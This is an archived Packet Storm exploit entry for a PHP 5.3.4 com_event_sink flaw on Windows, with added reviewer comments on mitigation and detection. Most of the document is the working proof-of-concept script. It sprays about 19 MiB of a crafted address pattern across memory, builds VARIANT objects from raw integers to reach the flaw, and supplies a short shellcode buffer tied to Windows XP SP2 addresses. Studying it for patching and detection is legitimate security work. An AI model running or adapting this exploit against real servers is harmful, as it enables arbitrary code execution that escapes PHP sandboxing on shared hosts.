PHP 5.3.4 com_event_sink 0-Day

2012-10-09T00:00:00
ID PACKETSTORM:117245
Type packetstorm
Reporter FB1H2S
Modified 2012-10-09T00:00:00

Description

                                        
                                            `  
  
<?php  
//PHP 5.3.4   
//
// Published proof of concept (reporter FB1H2S / Rahul Sasi) for a memory-safety
// flaw reached through com_event_sink() in PHP's Windows COM extension.
// What the script does, in order:
//   1. builds a ~18.8 MiB string out of one repeating 8-byte pattern,
//   2. stores four copies of it so the PHP process holds them at the same time,
//   3. calls com_event_sink() with VARIANTs constructed from raw integers.
// The author reports testing only on PHP 5.3.4 / Microsoft XP Pro 2002 SP2.
//
// Reviewer notes (defensive):
//   - The linked write-up title calls this a local exploit: the attacker must
//     already be able to run PHP code. It matters where php.ini restrictions
//     are relied on to contain untrusted scripts, e.g. shared hosting.
//   - NOTE(review): presumably the extension uses the integer held in the
//     VARIANT as a COM interface pointer without checking the variant's type;
//     this page does not show the extension source, so confirm against the
//     PHP changelog. The fixed release is not stated on this page.
//   - Mitigation: run a supported PHP release; where COM is not needed, list
//     com_event_sink in disable_functions and the COM/VARIANT classes in
//     disable_classes.
//   - Detection: PHP source that passes `new VARIANT(<integer literal>)` to
//     com_event_sink(), usually next to loops that build multi-megabyte
//     strings, and a sudden memory jump of tens of MiB in the PHP process.
  
//  
// Commented-out alternative below is the byte string "DCBA" (0x41424344 when
// read as little-endian), an easily recognised test value.
//$eip ="\x44\x43\x42\x41";  
// Two 4-byte strings. The names suggest the CPU registers the author expects
// them to end up in; that cannot be verified from this page.
$eip= "\x4b\xe8\x57\x78";  
// Read as a little-endian 32-bit value this is 0x048d0180.
$eax ="\x80\x01\x8d\x04";  
$deodrant="";  
// 8-byte pair repeated 0x80 (128) times = 1024 bytes.
$axespray = str_repeat($eip.$eax,0x80);  
  
//048d0190  
// Prints the pattern length (1024) before the banner, with no separator.
echo strlen($axespray);  
echo "PHP 5.3.4 WIN Com Module COM_SINK 0-day\n" ;  
echo "By Rahul Sasi : http://twitter.com/fb1h2s\n" ;  
echo "Exploit Tested on:\n Microsoft XP Pro 2002 SP2 \n" ;  
echo "More Details Here:\n http://www.garage4hackers.com/blogs/8/web-app-remote-code-execution-via-scripting-engines-part-1-local-exploits-php-0-day-394/\n" ;  
  
  
//19200 ==4B32 4b00  
// Author's note above is inconsistent: 0x4B00 is 19200, but the bound actually
// used, 0x4B32, is 19250. Result: 19250 * 1024 = 19,712,000 bytes in $deodrant.
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++)  
{  
$deodrant.=$axespray;  
}  
  
  
$terminate = "T";  
  
// Four array elements hold the large string; the last three are new strings
// built by concatenation (pattern plus one trailing "T").
// NOTE(review): presumably done so the pattern covers a wide, predictable
// address range in the process - the page does not explain the choice of four.
$u[] =$deodrant;  
  
$r[] =$deodrant.$terminate;  
$a[] =$deodrant.$terminate;  
$s[] =$deodrant.$terminate;  
  
  
//$vVar = new VARIANT(0x048d0038+$offset); // This is what we controll  
// A VARIANT built from a plain integer, not from a COM object. The integer is
// in the same 0x048dxxxx range as the bytes in $eax and the author's note above.
$vVar = new VARIANT(0x048d0000+180);   
//alert box Shellcode   
// Author's label, not verified here. The bytes embed two absolute 32-bit
// values in the 0x7C8xxxxx range (0x7C82DD38, 0x7C860AD8), so the payload is
// presumably tied to the exact OS build listed in the banner.
$buffer = "\x90\x90\x90".  
"\xB9\x38\xDD\x82\x7C\x33\xC0\xBB".  
"\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";  
  
// Second integer-backed VARIANT; 0x41414242 is the ASCII bytes "AABB".
$var2 = new VARIANT(0x41414242);  
  
// The call under test. Both VARIANT arguments wrap integers rather than COM
// objects, and the third argument is the raw byte string above.
com_event_sink($vVar,$var2,$buffer);  
  
  
  
  
?>  
`